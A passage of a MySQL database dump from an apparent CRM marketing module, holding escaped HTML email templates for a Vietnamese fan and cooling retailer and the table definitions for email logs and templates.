style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180196473-sunon_1.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180218600-vimf-2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181250240-contact.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #cc7202;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #cc7202;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Kh\\u00f4ng c\\u00f3 nh\\u00e0 s\\u1ea3n xu\\u1ea5t qu\\u1ea1t n\\u00e0o n\\u1ed7 l\\u1ef1c t\\u1ea1o ra c\\u00e1c s\\u1ea3n ph\\u1ea9m ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng h\\u01a1n Qu\\u1ea1t Big Ass. \\u0110\\u00f3 l\\u00e0 l\\u00fd do t\\u1ea1i sao c\\u00e1c doanh nghi\\u1ec7p tr\\u00ean to\\u00e0n th\\u1ebf gi\\u1edbi s\\u1eed d\\u1ee5ng qu\\u1ea1t c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 c\\u1eaft gi\\u1ea3m t\\u1edbi 30% chi ph\\u00ed l\\u00e0m m\\u00e1t v\\u00e0 t\\u1ea1i sao c\\u00e1c nh\\u00e0 thi\\u1ebft k\\u1ebf d\\u1ef1a v\\u00e0o c\\u00e1c m\\u1eabu qu\\u1ea1t tr\\u1ea7n \\u0111\\u01b0\\u1ee3c x\\u1ebfp h\\u1ea1ng ENERGY STAR\\u00ae c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 \\u0111\\u00e1p \\u1ee9ng nhu c\\u1ea7u ng\\u00e0y c\\u00e0ng t\\u0103ng \\u0111\\u1ed1i v\\u1edbi c\\u00e1c d\\u1ef1 \\u00e1n b\\u1ec1n v\\u1eefng, \\u0111\\u01b0\\u1ee3c ch\\u1ee9ng nh\\u1eadn LEED.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #ecf0f1\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #ecf0f1;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:187px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"187\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:187px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/linkedin.com\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; color: #333333; line-height: 180%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong><span style=\\\"line-height: 25.2px;\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 180%;\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\r\\n<p style=\\\"line-height: 180%;\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\r\\n<p style=\\\"line-height: 180%;\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\r\\n<p style=\\\"line-height: 180%;\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\"noopener\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_email_click_logs`
--

CREATE TABLE `tblma_email_click_logs` (
  `id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `campaign_id` int(11) DEFAULT NULL,
  `email_id` int(11) DEFAULT NULL,
  `url` text DEFAULT NULL,
  `time` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_email_logs`
--

CREATE TABLE `tblma_email_logs` (
  `id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `campaign_id` int(11) DEFAULT NULL,
  `email_template_id` int(11) DEFAULT NULL,
  `delivery` int(11) NOT NULL DEFAULT 0,
  `open` int(11) NOT NULL DEFAULT 0,
  `click` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL,
  `delivery_time` datetime DEFAULT NULL,
  `open_time` datetime DEFAULT NULL,
  `click_time` datetime DEFAULT NULL,
  `email_id` int(11) DEFAULT NULL,
  `failed` int(11) NOT NULL DEFAULT 0,
  `failed_time` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_email_templates`
--

CREATE TABLE `tblma_email_templates` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `color` text NOT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `language` text DEFAULT NULL,
  `data_html` longtext DEFAULT NULL,
  `data_design` longtext DEFAULT NULL,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_email_templates`
--

INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(1, 'Tổ chức đào tạo WIT', '', 4, 1, 'vietnamese', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  